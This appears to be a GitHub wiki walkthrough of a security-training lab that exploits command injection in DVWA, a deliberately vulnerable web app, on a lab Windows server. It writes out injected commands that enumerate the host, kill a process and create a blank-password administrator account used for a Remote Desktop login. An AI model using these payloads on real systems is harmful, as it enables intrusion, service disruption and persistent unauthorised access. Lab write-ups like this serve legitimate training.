Remote access using the common injection dvwm - singirikondamani/Noted GitHub Wiki

Here’s a simplified step-by-step breakdown of the process:

1. Login to DVWA:

   • Enter Username: gordonb, Password: abc123.
   • Click Login.

2. Access Command Injection:

   • Click Command Injection in the left pane.

3. Ping a Device:

   • Enter the IP address of the Windows Server (10.10.1.22) in the IP address field.
   • Click Submit to ping the machine.

4. Test Command Execution:

   • Enter | hostname and click Submit.
   • DVWA returns an error because the security level is set to Impossible.

5. Change Security Level:

   • Click DVWA Security in the left pane.
   • Set the security level to Low and click Submit.

6. Execute Commands:

   • Go back to Command Injection.
   • Enter | hostname again and click Submit.
   • DVWA returns the hostname of the Windows Server.

7. Extract More Information:

   • Enter | whoami and click Submit to display user info.
   • Enter | tasklist to view running processes.

8. Terminate a Process:

   • Note the PID of a process (e.g., 3112) and enter | taskkill /PID 3112 /F.
   • Click Submit to terminate the process.

9. View Directory Structure:

   • Enter | dir C:\ and click Submit to view the C drive files.

10. View and Add Users:

    • Enter | net user to list user accounts.
    • Add a new user by typing | net user Test /Add.
    • Confirm the account by typing | net user Test.

11. Assign Admin Privileges:

    • Enter | net localgroup Administrators Test /Add and click Submit.

12. Connect via Remote Desktop:

    • Open Remote Desktop Connection.
    • Enter the target system’s IP (10.10.1.22).
    • Use test as the username, leave the password blank, and click Connect.

13. Close Session:

    • Log out from the remote desktop and close the application.

This concludes the steps for exploiting command execution vulnerability in DVWA.